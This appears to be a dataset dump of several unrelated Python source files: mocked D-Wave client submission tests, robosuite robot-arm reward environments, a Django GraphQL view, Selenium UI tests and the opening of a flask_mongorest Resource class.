content stringlengths 5 1.05M |
|---|
"""Test problem submission against hard-coded replies with unittest.mock."""
from __future__ import division, absolute_import, print_function, unicode_literals
import time
import json
import unittest
import itertools
import threading
from datetime import datetime, timedelta
from dateutil.tz import UTC
from dateutil.parser import parse as parse_datetime
from dwave.cloud.utils import evaluate_ising
from dwave.cloud.qpu import Client, Solver
from dwave.cloud.exceptions import SolverFailureError, CanceledFutureError
from dwave.cloud.testing import mock
def solver_data(id_, incomplete=False):
"""Return data for a solver."""
obj = {
"properties": {
"supported_problem_types": ["qubo", "ising"],
"qubits": [0, 1, 2, 3, 4],
"couplers": list(itertools.combinations(range(5), 2)),
"num_qubits": 3,
"parameters": {"num_reads": "Number of samples to return."}
},
"id": id_,
"description": "A test solver"
}
if incomplete:
del obj['properties']['parameters']
return obj
def complete_reply(id_, solver_name):
"""Reply with solutions for the test problem."""
return json.dumps({
"status": "COMPLETED",
"solved_on": "2013-01-18T10:26:00.020954",
"solver": solver_name,
"submitted_on": "2013-01-18T10:25:59.941674",
"answer": {
'format': 'qp',
"num_variables": 5,
"energies": 'AAAAAAAALsA=',
"num_occurrences": 'ZAAAAA==',
"active_variables": 'AAAAAAEAAAACAAAAAwAAAAQAAAA=',
"solutions": 'AAAAAA==',
"timing": {}
},
"type": "ising",
"id": id_
})
def complete_no_answer_reply(id_, solver_name):
"""A reply saying a problem is finished without providing the results."""
return json.dumps({
"status": "COMPLETED",
"solved_on": "2012-12-05T19:15:07+00:00",
"solver": solver_name,
"submitted_on": "2012-12-05T19:06:57+00:00",
"type": "ising",
"id": id_
})
def error_reply(id_, solver_name, error):
"""A reply saying an error has occurred."""
return json.dumps({
"status": "FAILED",
"solved_on": "2013-01-18T10:26:00.020954",
"solver": solver_name,
"submitted_on": "2013-01-18T10:25:59.941674",
"type": "ising",
"id": id_,
"error_message": error
})
def cancel_reply(id_, solver_name):
"""A reply saying a problem was canceled."""
return json.dumps({
"status": "CANCELLED",
"solved_on": "2013-01-18T10:26:00.020954",
"solver": solver_name,
"submitted_on": "2013-01-18T10:25:59.941674",
"type": "ising",
"id": id_
})
def timestamp_in_future(seconds=0):
now = datetime.utcnow().replace(tzinfo=UTC)
return now + timedelta(seconds=seconds)
def continue_reply(id_, solver_name, now=None, eta_min=None, eta_max=None):
"""A reply saying a problem is still in the queue."""
if not now:
now = datetime.utcnow().replace(tzinfo=UTC)
resp = {
"status": "PENDING",
"solved_on": None,
"solver": solver_name,
"submitted_on": now.isoformat(),
"type": "ising",
"id": id_
}
if eta_min:
resp.update({
"earliest_estimated_completion": eta_min.isoformat(),
})
if eta_max:
resp.update({
"latest_estimated_completion": eta_max.isoformat(),
})
return json.dumps(resp)
def choose_reply(path, replies):
"""Choose the right response based on the path and make a mock response."""
if path in replies:
response = mock.Mock(['json', 'raise_for_status'])
response.status_code = 200
response.json.side_effect = lambda: json.loads(replies[path])
return response
else:
raise NotImplementedError(path)
class _QueryTest(unittest.TestCase):
def _check(self, results, linear, quad, num):
# Did we get the right number of samples?
self.assertTrue(100 == sum(results.occurrences))
# Make sure the number of occurrences and energies are all correct
for energy, state in zip(results.energies, results.samples):
self.assertTrue(energy == evaluate_ising(linear, quad, state))
@mock.patch('time.sleep', lambda *x: None)
class MockSubmission(_QueryTest):
"""Test connecting and some related failure modes."""
def test_submit_null_reply(self):
"""Get an error when the server's response is incomplete."""
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
client.session.post = lambda a, _: choose_reply(a, {'endpoint/problems/': ''})
solver = Solver(client, solver_data('abc123'))
# Build a problem
linear = {index: 1 for index in solver.nodes}
quad = {key: -1 for key in solver.undirected_edges}
results = solver.sample_ising(linear, quad, num_reads=100)
with self.assertRaises(ValueError):
results.samples
def test_submit_ok_reply(self):
"""Handle a normal query and response."""
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
client.session.post = lambda a, _: choose_reply(a, {
'endpoint/problems/': '[%s]' % complete_no_answer_reply('123', 'abc123')})
client.session.get = lambda a: choose_reply(a, {'endpoint/problems/123/': complete_reply('123', 'abc123')})
solver = Solver(client, solver_data('abc123'))
# Build a problem
linear = {index: 1 for index in solver.nodes}
quad = {key: -1 for key in solver.undirected_edges}
results = solver.sample_ising(linear, quad, num_reads=100)
self._check(results, linear, quad, 100)
def test_submit_error_reply(self):
"""Handle an error on problem submission."""
error_body = 'An error message'
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
client.session.post = lambda a, _: choose_reply(a, {
'endpoint/problems/': '[%s]' % error_reply('123', 'abc123', error_body)})
solver = Solver(client, solver_data('abc123'))
# Build a problem
linear = {index: 1 for index in solver.nodes}
quad = {key: -1 for key in solver.undirected_edges}
results = solver.sample_ising(linear, quad, num_reads=100)
with self.assertRaises(SolverFailureError):
results.samples
def test_submit_cancel_reply(self):
"""Handle a response for a canceled job."""
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
client.session.post = lambda a, _: choose_reply(a, {'endpoint/problems/': '[%s]' % cancel_reply('123', 'abc123')})
solver = Solver(client, solver_data('abc123'))
# Build a problem
linear = {index: 1 for index in solver.nodes}
quad = {key: -1 for key in solver.undirected_edges}
results = solver.sample_ising(linear, quad, num_reads=100)
with self.assertRaises(CanceledFutureError):
results.samples
def test_submit_continue_then_ok_reply(self):
"""Handle polling for a complete problem."""
with Client('endpoint', 'token') as client:
eta_min, eta_max = timestamp_in_future(10), timestamp_in_future(30)
client.session = mock.Mock()
client.session.post = lambda a, _: choose_reply(a, {
'endpoint/problems/': '[%s]' % continue_reply('123', 'abc123', eta_min=eta_min, eta_max=eta_max)
})
client.session.get = lambda a: choose_reply(a, {
'endpoint/problems/?id=123': '[%s]' % complete_no_answer_reply('123', 'abc123'),
'endpoint/problems/123/': complete_reply('123', 'abc123')
})
solver = Solver(client, solver_data('abc123'))
# Build a problem
linear = {index: 1 for index in solver.nodes}
quad = {key: -1 for key in solver.undirected_edges}
results = solver.sample_ising(linear, quad, num_reads=100)
self._check(results, linear, quad, 100)
# test future has eta_min and eta_max parsed correctly
self.assertEqual(results.eta_min, eta_min)
self.assertEqual(results.eta_max, eta_max)
def test_submit_continue_then_error_reply(self):
"""Handle polling for an error message."""
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
client.session.post = lambda a, _: choose_reply(a, {'endpoint/problems/': '[%s]' % continue_reply('123', 'abc123')})
client.session.get = lambda a: choose_reply(a, {
'endpoint/problems/?id=123': '[%s]' % error_reply('123', 'abc123', "error message")})
solver = Solver(client, solver_data('abc123'))
# Build a problem
linear = {index: 1 for index in solver.nodes}
quad = {key: -1 for key in solver.undirected_edges}
results = solver.sample_ising(linear, quad, num_reads=100)
with self.assertRaises(SolverFailureError):
self._check(results, linear, quad, 100)
# Reduce the number of poll and submission threads so that the system can be tested
@mock.patch.object(Client, "_POLL_THREAD_COUNT", 1)
@mock.patch.object(Client, "_SUBMISSION_THREAD_COUNT", 1)
def test_submit_continue_then_ok_and_error_reply(self):
"""Handle polling for the status of multiple problems."""
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
# on first status poll, return pending for both problems
# on second status poll, return error for first problem and complete for second
def continue_then_complete(path, state={'count': 0}):
state['count'] += 1
if state['count'] < 2:
return choose_reply(path, {
'endpoint/problems/?id=1': '[{}]'.format(continue_reply('1', 'abc123')),
'endpoint/problems/?id=2': '[{}]'.format(continue_reply('2', 'abc123')),
'endpoint/problems/1/': continue_reply('1', 'abc123'),
'endpoint/problems/2/': continue_reply('2', 'abc123'),
'endpoint/problems/?id=1,2': '[{},{}]'.format(continue_reply('1', 'abc123'),
continue_reply('2', 'abc123')),
'endpoint/problems/?id=2,1': '[{},{}]'.format(continue_reply('2', 'abc123'),
continue_reply('1', 'abc123'))
})
else:
return choose_reply(path, {
'endpoint/problems/?id=1': '[{}]'.format(error_reply('1', 'abc123', 'error')),
'endpoint/problems/?id=2': '[{}]'.format(complete_no_answer_reply('2', 'abc123')),
'endpoint/problems/1/': error_reply('1', 'abc123', 'error'),
'endpoint/problems/2/': complete_reply('2', 'abc123'),
'endpoint/problems/?id=1,2': '[{},{}]'.format(error_reply('1', 'abc123', 'error'),
complete_no_answer_reply('2', 'abc123')),
'endpoint/problems/?id=2,1': '[{},{}]'.format(complete_no_answer_reply('2', 'abc123'),
error_reply('1', 'abc123', 'error'))
})
client.session.get = continue_then_complete
def accept_problems_with_continue_reply(path, body, ids=iter('12')):
problems = json.loads(body)
return choose_reply(path, {
'endpoint/problems/': json.dumps(
[json.loads(continue_reply(next(ids), 'abc123')) for _ in problems])
})
client.session.post = accept_problems_with_continue_reply
solver = Solver(client, solver_data('abc123'))
linear = {index: 1 for index in solver.nodes}
quad = {key: -1 for key in solver.undirected_edges}
results1 = solver.sample_ising(linear, quad, num_reads=100)
results2 = solver.sample_ising(linear, quad, num_reads=100)
with self.assertRaises(SolverFailureError):
self._check(results1, linear, quad, 100)
self._check(results2, linear, quad, 100)
# Reduce the number of poll and submission threads so that the system can be tested
@mock.patch.object(Client, "_POLL_THREAD_COUNT", 1)
@mock.patch.object(Client, "_SUBMISSION_THREAD_COUNT", 1)
def test_exponential_backoff_polling(self):
"After each poll, back-off should double"
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
# on submit, return status pending
client.session.post = lambda path, _: choose_reply(path, {
'endpoint/problems/': '[%s]' % continue_reply('123', 'abc123')
})
# on first and second status poll, return pending
# on third status poll, return completed
def continue_then_complete(path, state={'count': 0}):
state['count'] += 1
if state['count'] < 3:
return choose_reply(path, {
'endpoint/problems/?id=123': '[%s]' % continue_reply('123', 'abc123'),
'endpoint/problems/123/': continue_reply('123', 'abc123')
})
else:
return choose_reply(path, {
'endpoint/problems/?id=123': '[%s]' % complete_no_answer_reply('123', 'abc123'),
'endpoint/problems/123/': complete_reply('123', 'abc123')
})
client.session.get = continue_then_complete
solver = Solver(client, solver_data('abc123'))
future = solver.sample_qubo({})
future.result()
# after third poll, back-off interval should be 4 x initial back-off
self.assertEqual(future._poll_backoff, Client._POLL_BACKOFF_MIN * 2**2)
@mock.patch.object(Client, "_POLL_THREAD_COUNT", 1)
@mock.patch.object(Client, "_SUBMISSION_THREAD_COUNT", 1)
def test_eta_min_is_respected_on_first_poll(self):
"eta_min/earliest_estimated_completion should be respected if present in response"
with Client('endpoint', 'token') as client:
eta_min, eta_max = timestamp_in_future(10), timestamp_in_future(30)
client.session = mock.Mock()
client.session.post = lambda path, _: choose_reply(path, {
'endpoint/problems/': '[%s]' % continue_reply('1', 'abc123', eta_min=eta_min, eta_max=eta_max)
})
client.session.get = lambda path: choose_reply(path, {
'endpoint/problems/?id=1': '[%s]' % complete_no_answer_reply('1', 'abc123'),
'endpoint/problems/1/': complete_reply('1', 'abc123')
})
solver = Solver(client, solver_data('abc123'))
def assert_min_eta(s):
s and self.assertTrue(abs(s - 10) < 1)
with mock.patch('time.sleep', assert_min_eta):
future = solver.sample_qubo({})
future.result()
@mock.patch.object(Client, "_POLL_THREAD_COUNT", 1)
@mock.patch.object(Client, "_SUBMISSION_THREAD_COUNT", 1)
def test_immediate_polling_without_eta_min(self):
"First poll happens with minimal delay if eta_min missing"
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
client.session.post = lambda path, _: choose_reply(path, {
'endpoint/problems/': '[%s]' % continue_reply('1', 'abc123')
})
client.session.get = lambda path: choose_reply(path, {
'endpoint/problems/?id=1': '[%s]' % complete_no_answer_reply('1', 'abc123'),
'endpoint/problems/1/': complete_reply('1', 'abc123')
})
solver = Solver(client, solver_data('abc123'))
def assert_no_delay(s):
s and self.assertTrue(
abs(s - client._POLL_BACKOFF_MIN) < client._POLL_BACKOFF_MIN / 10.0)
with mock.patch('time.sleep', assert_no_delay):
future = solver.sample_qubo({})
future.result()
class DeleteEvent(Exception):
"""Throws exception when mocked client submits an HTTP DELETE request."""
def __init__(self, url, body):
"""Return the URL of the request with the exception for test verification."""
self.url = url
self.body = body
@staticmethod
def handle(path, **kwargs):
"""Callback useable to mock a delete request."""
raise DeleteEvent(path, json.dumps(kwargs['json']))
@mock.patch('time.sleep', lambda *x: None)
class MockCancel(unittest.TestCase):
"""Make sure cancel works at the two points in the process where it should."""
def test_cancel_with_id(self):
"""Make sure the cancel method submits to the right endpoint.
When cancel is called after the submission is finished.
"""
submission_id = 'test-id'
reply_body = '[%s]' % continue_reply(submission_id, 'solver')
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
client.session.get = lambda a: choose_reply(a, {'endpoint/problems/?id={}'.format(submission_id): reply_body})
client.session.delete = DeleteEvent.handle
solver = Solver(client, solver_data('abc123'))
future = solver._retrieve_problem(submission_id)
future.cancel()
try:
self.assertTrue(future.id is not None)
future.samples
self.fail()
except DeleteEvent as event:
if event.url == 'endpoint/problems/':
self.assertEqual(event.body, '["{}"]'.format(submission_id))
else:
self.assertEqual(event.url, 'endpoint/problems/{}/'.format(submission_id))
def test_cancel_without_id(self):
"""Make sure the cancel method submits to the right endpoint.
When cancel is called before the submission has returned the problem id.
"""
submission_id = 'test-id'
reply_body = '[%s]' % continue_reply(submission_id, 'solver')
release_reply = threading.Event()
with Client('endpoint', 'token') as client:
client.session = mock.Mock()
client.session.get = lambda a: choose_reply(a, {'endpoint/problems/?id={}'.format(submission_id): reply_body})
def post(a, _):
release_reply.wait()
return choose_reply(a, {'endpoint/problems/': reply_body})
client.session.post = post
client.session.delete = DeleteEvent.handle
solver = Solver(client, solver_data('abc123'))
# Build a problem
linear = {index: 1 for index in solver.nodes}
quad = {key: -1 for key in solver.undirected_edges}
future = solver.sample_ising(linear, quad)
future.cancel()
try:
release_reply.set()
future.samples
self.fail()
except DeleteEvent as event:
if event.url == 'endpoint/problems/':
self.assertEqual(event.body, '["{}"]'.format(submission_id))
else:
self.assertEqual(event.url, 'endpoint/problems/{}/'.format(submission_id))
|
from rest_framework import permissions
|
import numpy as np
from robosuite.environments.manipulation.causal import Causal
from robosuite.utils.observables import Observable, sensor
class CausalGoal(Causal):
def __init__(self, xy_range=[0.3, 0.4], z_range=0.2, **kwargs):
"""
:param table_coverage: x y workspace ranges as a coverage factor of the table
:param z_range: z workspace range
"""
self.xy_range = xy_range
self.z_range = z_range
self.goal_space_low = None
self.visualize_goal = True
super().__init__(**kwargs)
def _setup_references(self):
"""
Sets up references to important components. A reference is typically an
index or a list of indices that point to the corresponding elements
in a flatten array, which is how MuJoCo stores physical simulation data.
"""
super()._setup_references()
# Additional object references from this env
assert self.num_movable_objects > 0
self.cube = self.movable_objects[0]
self.cube_body_id = self.sim.model.body_name2id(self.cube.root_body)
self.goal_vis_id = self.sim.model.body_name2id(self.model.mujoco_arena.goal_vis.root_body)
def _reset_internal(self):
"""
Resets simulation internal configurations.
"""
super()._reset_internal()
if self.goal_space_low is None:
table_len_x, table_len_y, _ = self.table_full_size
table_offset_z = self.table_offset[2]
x_range, y_range = self.xy_range
z_range = self.z_range
self.goal_space_low = np.array([-x_range,
-y_range,
table_offset_z + 0.02]) # 0.02 is the half-size of the object
self.goal_space_high = np.array([x_range,
y_range,
table_offset_z + z_range])
self.goal = np.random.uniform(self.goal_space_low, self.goal_space_high)
if self.visualize_goal:
goal_pos = self.goal.copy()
goal_pos[-1] -= self.table_offset[2]
self.sim.model.body_pos[self.goal_vis_id] = goal_pos
else:
self.sim.model.body_pos[self.goal_vis_id] = np.array([0, 0, -1])
def reward(self, action):
raise NotImplementedError
def check_success(self):
raise NotImplementedError
def step(self, action):
next_obs, reward, done, info = super().step(action)
info["success"] = self.check_success()
return next_obs, reward, done, info
def _setup_observables(self):
"""
Sets up observables to be used for this environment. Creates object-based observables if enabled
Returns:
OrderedDict: Dictionary mapping observable names to its corresponding Observable object
"""
observables = super()._setup_observables()
@sensor(modality="object")
def goal_pos(obs_cache):
return self.goal
observables["goal_pos"] = Observable(name="goal_pos", sensor=goal_pos, sampling_rate=self.control_freq)
return observables
class CausalReach(CausalGoal):
def reward(self, action):
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
dist = np.linalg.norm(gripper_site_pos - self.goal)
r_reach = 1 - np.tanh(10.0 * dist)
return r_reach
def check_success(self):
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
dist = np.linalg.norm(gripper_site_pos - self.goal)
return dist < 0.05
class CausalPush(CausalGoal):
def __init__(self, **kwargs):
assert "z_range" not in kwargs, "invalid set of arguments"
super().__init__(z_range=0.02, **kwargs)
def reward(self, action):
"""
Un-normalized summed components if using reward shaping:
- Reaching: in [0, reach_mult], to encourage the arm to reach the cube
- Pushing: in [0, push_mult], to encourage the arm to push the cube to the goal
Note that the final reward is normalized.
"""
reach_mult = 0.5
push_mult = 1.0
reward = 0
cube_pos = self.sim.data.body_xpos[self.cube_body_id]
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
dist = np.linalg.norm(gripper_site_pos - cube_pos)
r_reach = (1 - np.tanh(5.0 * dist)) * reach_mult
reward += r_reach
dist = np.linalg.norm(cube_pos - self.goal)
r_push = (1 - np.tanh(5.0 * dist)) * push_mult
reward += r_push
reward /= (reach_mult + push_mult)
return reward
def check_success(self):
cube_pos = self.sim.data.body_xpos[self.cube_body_id]
dist = np.linalg.norm(cube_pos - self.goal)
return dist < 0.05
class CausalPick(CausalGoal):
def reward(self, action):
"""
Un-normalized summed components if using reward shaping:
- Reaching: in [0, reach_mult], to encourage the arm to reach the cube
- Grasping: in {0, grasp_mult}, to encourage the arm to grasp the cube
- Lifting: in [0, lift_mult], to encourage the arm to lift the cube to the goal
Note that the final reward is normalized.
"""
reach_mult = 0.1
grasp_mult = 0.35
lift_mult = 0.5
gripper_open = action[-1] < 0
reward = 0
# cube_pos = self.sim.data.body_xpos[self.cube_body_id]
# gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
# dist = np.linalg.norm(gripper_site_pos - cube_pos)
# r_reach = (1 - np.tanh(5.0 * dist)) * reach_mult * gripper_open
#
# grasping_cubeA = self._check_grasp(gripper=self.robots[0].gripper, object_geoms=self.cube)
# if grasping_cubeA:
# r_reach += grasp_mult
#
# reward += r_reach
#
# dist = np.linalg.norm(cube_pos - self.goal)
# r_lift = (1 - np.tanh(5.0 * dist)) * lift_mult * (not gripper_open)
# reward += r_lift
#
# reward /= (reach_mult + grasp_mult + lift_mult)
max_dist = 1.1
xy_max_dist = 1.0
z_max_dist = 0.2
cube_pos = self.sim.data.body_xpos[self.cube_body_id]
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
xy_dist = np.abs(gripper_site_pos - cube_pos)[:2].sum()
z_dist = np.abs(gripper_site_pos - cube_pos)[-1]
dist_score = (xy_max_dist - xy_dist + (z_max_dist - z_dist) * (xy_dist < 0.05)) / (xy_max_dist + z_max_dist)
r_reach = dist_score * reach_mult * gripper_open
grasping_cubeA = self._check_grasp(gripper=self.robots[0].gripper, object_geoms=self.cube)
if grasping_cubeA:
r_reach += grasp_mult
reward += r_reach
dist = np.abs(self.goal - cube_pos).sum()
r_lift = (max_dist - dist) / max_dist * lift_mult * grasping_cubeA
reward += r_lift
reward /= (reach_mult + grasp_mult + lift_mult)
return reward
def check_success(self):
cube_pos = self.sim.data.body_xpos[self.cube_body_id]
dist = np.linalg.norm(cube_pos - self.goal)
return dist < 0.05
class CausalGrasp(CausalGoal):
def __init__(self, **kwargs):
assert "z_range" not in kwargs, "invalid set of arguments"
super().__init__(z_range=0, **kwargs)
self.visualize_goal = False
def reward(self, action):
"""
Un-normalized summed components if using reward shaping:
- Reaching: in [0, reach_mult], to encourage the arm to reach the cube
- Pushing: in [0, push_mult], to encourage the arm to push the cube to the goal
Note that the final reward is normalized.
"""
reach_mult = 0.5
grasp_mult = 1.0
gripper_close = action[-1]
cube_pos = self.sim.data.body_xpos[self.cube_body_id]
gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
dist = np.abs(gripper_site_pos - cube_pos).sum()
grasping_cubeA = self._check_grasp(gripper=self.robots[0].gripper, object_geoms=self.cube)
if grasping_cubeA:
reward = grasp_mult
else:
reward = (1 - np.tanh(10.0 * dist)) * (gripper_close < 0) * reach_mult
return reward
|
import json
from collections import OrderedDict
from typing import Tuple, Optional, Union, Callable
from cached_property import cached_property
from django import template
from django.core.handlers.wsgi import WSGIRequest
from django.views import View
from django.http import HttpResponse, HttpResponseNotAllowed, JsonResponse
from graphql.type.schema import GraphQLSchema
import slothql
from slothql.template import get_template_string
from .utils.request import get_operation_from_request
class GraphQLView(View):
DEBUG = True
allowed_methods = ('GET', 'POST')
graphiql_version: str = '0.11.10'
graphiql_template: str = 'graphiql.html'
schema: Union[GraphQLSchema, Callable] = None
@classmethod
def as_view(cls, **initkwargs):
schema = initkwargs.get('schema')
assert schema is not None, f'Expected schema to be of type Schema, but got {schema}'
return super().as_view(**initkwargs)
def dispatch(self, request: WSGIRequest, *args, **kwargs) -> HttpResponse:
if request.method not in self.allowed_methods:
return HttpResponseNotAllowed(['GET', 'POST'], 'GraphQL supports only GET and POST requests.')
query, parse_error = self.get_operation()
result, status_code = self.get_query_result(query)
if self.show_graphiql:
context = template.Context({**self.get_context_data(), **{'result': result if query else ''}})
return HttpResponse(self.template.render(context), status=status_code if query else 200)
if parse_error:
return JsonResponse({'errors': [{'message': parse_error}]}, status=400)
return HttpResponse(content=result, status=status_code, content_type='application/json')
@cached_property
def template(self) -> template.Template:
return template.Template(get_template_string(self.graphiql_template))
def get_operation(self) -> Tuple[Optional[slothql.Operation], Optional[str]]:
try:
return get_operation_from_request(self.request), None
except slothql.InvalidOperation as e:
return None, str(e)
def execute_operation(self, operation: slothql.Operation) -> slothql.ExecutionResult:
return slothql.gql(schema=self.get_schema(), operation=operation)
def get_query_result(self, operation: slothql.Operation = None) -> Tuple[Optional[str], int]:
if operation:
result = self.execute_operation(operation)
return self.jsonify(result), 200 if result.valid else 400
return None, 400
@classmethod
def jsonify(cls, data: dict) -> str:
if cls.DEBUG:
return json.dumps(data, sort_keys=True, indent=2, separators=(',', ': '))
return json.dumps(data, separators=(',', ':'))
def get_schema(self):
return self.DEBUG and self.schema(self.request) if callable(self.schema) else self.schema
@property
def show_graphiql(self) -> bool:
return self.request.method == 'GET' and self.request.content_type in ('text/plain', 'text/html')
def get_context_data(self) -> OrderedDict:
return OrderedDict({
'title': 'GraphiQL',
'graphiql_version': self.graphiql_version,
})
|
self.Item.insert(index, value)
self.numberOfItems = len(self.Item) |
# TC001 - User registration (with random data)
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
import time
import random
import string
from selenium.webdriver.common.by import By
options = Options()
options.headless = True
driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)
# Load page
driver.get("http://localhost:1667/")
time.sleep(5)
def test_register():
# Collection of xpath
sign_up_btn = '//*[@id="app"]/nav/div/ul/li[3]/a'
username_x = '//*[@id="app"]/div/div/div/div/form/fieldset[1]/input'
email_x = '//*[@id="app"]/div/div/div/div/form/fieldset[2]/input'
pw_x = '//*[@id="app"]/div/div/div/div/form/fieldset[3]/input'
sign_up_x = '//*[@id="app"]/div/div/div/div/form/button'
# Enter random data
email = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10)) + '@mail.com'
pw = ''.join((random.choice(string.ascii_letters + string.digits) for i in range(10)))
username = ''.join((random.choice(string.ascii_letters + string.digits) for i in range(10)))
# Sign up
driver.find_element(By.XPATH, sign_up_btn).click()
time.sleep(2)
driver.find_element(By.XPATH, username_x).send_keys(username)
driver.find_element(By.XPATH, email_x).send_keys(email)
driver.find_element(By.XPATH, pw_x).send_keys(pw)
driver.find_element(By.XPATH, sign_up_x).click()
time.sleep(10)
# Check 'Welcome' message
assert ('Welcome!' in driver.find_element(By.XPATH, '/html/body/div[2]/div/div[2]').text)
time.sleep(5)
driver.find_element(By.XPATH, "/html/body/div[2]/div/div[4]/div/button").click()
driver.close()
|
import unittest
import time
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
class BlogTest(unittest.TestCase):
@classmethod
def setUp(self):
self.driver = webdriver.Firefox(executable_path="/home/dibyadarshan/Desktop/Github Repos/mezzanine/test/geckodriver")
self.driver.get('http://127.0.0.1:8000/blog/test-blog-post/')
self.driver.maximize_window()
# @unittest.skip("RSS")
def testRSS(self):
wait = WebDriverWait(self.driver, 10)
driver = self.driver
rss_element = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="body"]/div[3]/div/div[3]/div[2]/div/a[1]')))
rss_element.click()
@unittest.skip("Twitter")
def testTwitter(self):
wait = WebDriverWait(self.driver, 10)
driver = self.driver
twitter_element = wait.until(EC.element_to_be_clickable((By.LINK_TEXT, 'Share on Twitter')))
twitter_element.click()
time.sleep(2)
window_before = driver.window_handles[0]
window_after = driver.window_handles[1]
driver.switch_to.window(window_after)
self.assertEqual("twitter" in driver.current_url, True)
@unittest.skip("Facebook")
def testFacebook(self):
wait = WebDriverWait(self.driver, 10)
driver = self.driver
facebook_element = wait.until(EC.element_to_be_clickable((By.LINK_TEXT, 'Share on Facebook')))
facebook_element.click()
time.sleep(2)
window_before = driver.window_handles[0]
window_after = driver.window_handles[1]
driver.switch_to.window(window_after)
self.assertEqual("facebook" in driver.current_url, True)
@classmethod
def tearDown(self):
self.driver.quit()
if __name__== "__main__":
unittest.main() |
import contextlib
import json
from typing import Dict, List, Type
from urllib.parse import urlparse
import mongoengine
from bson.dbref import DBRef
from bson.objectid import ObjectId
from flask import has_request_context, request, url_for
try: # closeio/mongoengine
from mongoengine.base.proxy import DocumentProxy
from mongoengine.fields import SafeReferenceField
except ImportError:
DocumentProxy = None
SafeReferenceField = None
from cleancat import ValidationError as SchemaValidationError
from mongoengine.fields import (
DictField,
EmbeddedDocumentField,
GenericReferenceField,
ListField,
ReferenceField,
)
from flask_mongorest import methods
from flask_mongorest.exceptions import UnknownFieldError, ValidationError
from flask_mongorest.utils import cmp_fields, equal, isbound, isint
class ResourceMeta(type):
def __init__(cls, name, bases, classdict):
if classdict.get("__metaclass__") is not ResourceMeta:
for document, resource in cls.child_document_resources.items():
if resource == name:
cls.child_document_resources[document] = cls
type.__init__(cls, name, bases, classdict)
class Resource(metaclass=ResourceMeta):
# MongoEngine Document class related to this resource (required)
document = None
# List of fields that can (and should by default) be included in the
# response
fields = None
# Dict of original field names (as seen in `fields`) and what they should
# be renamed to in the API response
rename_fields: Dict[str, str] = {}
# CleanCat Schema class (used for validation)
schema = None
# List of fields that the objects can be ordered by
allowed_ordering: List[str] = []
# Define whether or not this resource supports pagination
paginate = True
# Default limit if no _limit is specified in the request. Only relevant
# if pagination is enabled.
default_limit = 100
# Maximum value of _limit that can be requested (avoids DDoS'ing the API).
# Only relevant if pagination is enabled.
max_limit = 100
# Maximum number of objects which can be bulk-updated by a single request
bulk_update_limit = 1000
# Map of field names and Resource classes that should be used to handle
# these fields (for serialization, saving, etc.).
related_resources: Dict[str, "Resource"] = {}
# Map of field names on this resource's document to field names on the
# related resource's document, used as a helper in the process of
# turning a field value from a queryset to a list of objects
#
# TODO Behavior of this is *very* unintuitive and should be changed or
# dropped, or at least refactored
related_resources_hints: Dict[str, str] = {}
# List of field names corresponding to related resources. If a field is
# mentioned here and in `related_resources`, it can be created/updated
# from within this resource.
save_related_fields: List[str] = []
# Map of MongoEngine Document classes to Resource class names. Defines
# which sub-resource should be used for handling a particular subclass of
# this resource's document.
child_document_resources: Dict[Type, str] = {}
# Whenever a new document is posted and the system doesn't know the type
# of it yet, it will choose a default sub-resource for this document type
default_child_resource_document = None
# Defines whether MongoEngine's select_related should be used on a
# filtered query set, pulling all the references efficiently.
select_related = False
# Must start and end with a "/"
uri_prefix = None
def __init__(self, view_method=None):
"""
Initialize a resource. Optionally, a method class can be given to
view_method (see methods.py) so the resource can behave differently
depending on the method.
"""
doc_fields = self.document._fields.keys()
if self.fields is None:
self.fields = doc_fields
self._related_resources = self.get_related_resources()
self._rename_fields = self.get_rename_fields()
self._reverse_rename_fields = {}
for k, v in self._rename_fields.items():
self._reverse_rename_fields[v] = k
assert len(self._rename_fields) == len(
self._reverse_rename_fields
), "Cannot rename multiple fields to the same name"
self._filters = self.get_filters()
self._child_document_resources = self.get_child_document_resources()
self._default_child_resource_document = (
self.get_default_child_resource_document()
)
self.data = None
self._dirty_fields = None
self.view_method = view_method
@property
def params(self):
"""
Return parameters of the request which is currently being processed.
Params can be passed in two different ways:
1. As a querystring (e.g. '/resource/?status=active&_limit=10').
2. As a _params property in the JSON payload. For example:
{ '_params': { 'status': 'active', '_limit': '10' } }
"""
if not has_request_context():
# `params` doesn't make sense if we don't have a request
raise AttributeError
if not hasattr(self, "_params"):
if "_params" in self.raw_data:
self._params = self.raw_data["_params"]
else:
try:
self._params = request.args.to_dict()
except AttributeError: # mocked request with regular dict
self._params = request.args
return self._params
def _enforce_strict_json(self, val):
"""
Enforce strict json parsing.
Raise a ValueError if NaN, Infinity, or -Infinity were posted. By
default, json.loads accepts these values, but it allows us to perform
extra validation via a parse_constant kwarg.
"""
# according to the `json.loads` docs: "parse_constant, if specified,
# will be called with one of the following strings: '-Infinity',
# 'Infinity', 'NaN'". Since none of them are valid JSON, we can simply
# raise an exception here.
raise ValueError
@property
def raw_data(self):
"""Validate and return parsed JSON payload."""
if not has_request_context():
# `raw_data` doesn't make sense if we don't have a request
raise AttributeError
if not hasattr(self, "_raw_data"):
if request.method in ("PUT", "POST") or request.data:
if request.mimetype and "json" not in request.mimetype:
raise ValidationError(
{
"error": "Please send valid JSON with a 'Content-Type: application/json' header."
}
)
